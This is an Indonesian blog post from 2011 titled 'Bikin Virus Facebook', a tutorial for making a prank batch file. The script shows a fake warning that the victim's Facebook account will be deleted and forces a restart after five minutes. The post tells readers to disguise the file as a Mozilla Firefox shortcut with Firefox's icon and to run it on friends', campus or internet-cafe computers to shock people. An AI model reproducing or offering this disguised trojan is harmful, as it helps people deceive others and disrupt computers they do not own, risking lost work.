Posted by : Endra Nero Jumat, 12 Agustus 2011
Tag :

Bikin Virus Facebook


virus facebook





Gak Usah Basa Basi, Langsung AJA YA :)

1. Buka program notepad atau biar cepet menu RUN ketik notepad lalu enter

2. Copy kode ini dan paste kan di notepad kamu
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED BY SHADOWSMAKER IH-crew!!! PLEASE WAIT ………..”


3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi nama apa, misal :pacebuk.bat dan SAVE di Dekstop (Recommended)
4. Sekarang klik kanan desktopmu dan pilih New - Shortcut

5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file .bat yang kamu simpen tadi, misal tadi kamu save pada dekstop

6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya sebagai tipuan aja)

7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?
Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon Gak nemu icon mozilla ? Coba deh low cari di Program Files - Mozilla Firefox
Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi .. Harusnya pasti sedikit kaget dan coba kamu bayangkan kalau trik ini kamu praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet.. what will happen ? hahhaha .

Cobain aja, biar temenmu shock, hahaha :D


;
Anda sedang membaca artikel tentang Bikin Virus Facebook dan anda bisa menemukan artikel Bikin Virus Facebook ini dengan url http://nero-vista.blogspot.com/2011/08/bikin-virus-facebook.html, anda boleh menyebar luaskannya atau mengcopy paste-nya jika artikel Bikin Virus Facebook ini sangat bermanfaat bagi teman-teman anda, namun jangan lupa untuk meletakkan link Bikin Virus Facebook sumbernya, Thx

Artikel Terkait Lainnya :



Leave a Reply

Berkomentarlah dengan baik..
1. No Spam
2. No Sara
3. No Kata2 Jorok

Subscribe to Posts | Subscribe to Comments

Papan Update

2015

  • Nero-Vista Blog akan vakum untuk sementara, mohon maaf atas ketidaknyamanannya

  • MARI SUPPORT BLOG INI

    Post Terpopuler





    close





    - Copyright © 2011 Nero Vista -Shinpuru V2 by Djogz- Modified by Nero Endra -